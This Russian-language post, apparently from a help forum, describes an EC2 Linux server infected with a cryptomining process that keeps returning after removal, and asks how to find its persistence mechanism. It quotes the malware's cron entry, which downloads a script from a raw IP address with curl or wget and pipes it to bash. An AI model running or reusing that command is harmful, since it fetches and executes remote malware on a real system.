За последние несколько дней я заметил, что приложения, запущенные на моем экземпляре EC2 Linux, очень медленные. Запуск topкоманды показал мне, что есть процесс, /var/tmp/sustseиспользующий большую часть ресурсов ЦП.
Я убил этот процесс. Однако после перезагрузки экземпляра он снова запустился и использовал большую часть ЦП. Он также делает записи cron для следующего скрипта:
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
Я погуглил и обнаружил, что это вредоносная программа для майнинга криптовалют. Я удалил ее следы из/var/tmp/и удалил записи в Crontab. Однако эти записи в Crontab, похоже, откуда-то возвращаются, и я не смог отследить точное местоположение скрипта, который делает эти записи.
Я также очистил записи /var/spool/cron*.
Я не нашел в сети никакой информации, чтобы исправить эту проблему. Любая помощь здесь была бы очень признательна.
Заранее спасибо!!